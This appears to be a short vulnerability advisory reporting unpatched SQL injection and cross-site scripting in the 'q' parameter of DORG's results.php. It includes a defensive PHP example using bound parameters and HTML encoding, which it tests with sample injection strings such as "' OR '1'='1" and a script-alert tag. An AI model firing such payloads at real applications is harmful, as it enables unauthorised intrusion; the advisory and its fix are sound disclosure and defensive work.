vendor: Disc Organization System
by: SECUPENT
CVSS: 7,5 HIGH
SQL Injection and Cross Site Scripting
CWE: 89 (SQL Injection) and 79 (Cross-site Scripting)
Product Name: Disc Organization System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2016
DORG – Disc Organization System SQL Injection And Cross Site Scripting
DORG is vulnerable to SQL Injection and Cross Site Scripting. Both issues are in the 'q' parameter of the 'results.php' page: an attacker can inject malicious SQL queries through it, and can also inject malicious JavaScript code through it.
Mitigation:
Input validation should be used to prevent SQL Injection and Cross Site Scripting attacks. Sanitize user input and escape special characters.
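
One way to apply this mitigation to a search parameter such as 'q', as an added example that is not DORG's code: the `discs` table, the `title` column and the function names are assumptions, and an in-memory SQLite database stands in for the real one. The value is validated, bound as a query parameter instead of being concatenated into the SQL, and encoded for HTML when it is echoed back.

```php
<?php
declare(strict_types=1);

// Hypothetical search handler for a 'q' parameter; the schema is assumed, not DORG's.
function search_discs(PDO $db, string $q): array
{
    // Validate: bound the length and reject control characters.
    if (strlen($q) > 100 || preg_match('/[\x00-\x1F\x7F]/', $q)) {
        return [];
    }
    // Escape LIKE wildcards so '%' and '_' in the input match literally.
    $pattern = '%' . str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $q) . '%';
    // Bound parameter: the value is passed as data and never parsed as SQL.
    $stmt = $db->prepare("SELECT title FROM discs WHERE title LIKE :p ESCAPE '!'");
    $stmt->execute([':p' => $pattern]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

function render_results(string $q, array $titles): string
{
    // Encode for the HTML body context; ENT_QUOTES also covers attribute values.
    $enc = fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $html = '<p>Results for "' . $enc($q) . '"</p><ul>';
    foreach ($titles as $t) {
        // Stored values are encoded too, not only the echoed query.
        $html .= '<li>' . $enc($t) . '</li>';
    }
    return $html . '</ul>';
}

// Constructed in-memory database standing in for the application's data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE discs (title TEXT)');
$db->exec("INSERT INTO discs VALUES ('Backup 2016'), ('100% Live')");

// Constructed inputs: a plain term, SQL metacharacters, markup, and a wildcard.
foreach (['Backup', "' OR '1'='1", '<script>alert(1)</script>', '%'] as $q) {
    echo render_results($q, search_discs($db, $q)), "\n";
}
```

The quote-bearing and markup inputs return no rows and appear in the output only as encoded text, while the bare '%' matches only the title that contains a literal percent sign.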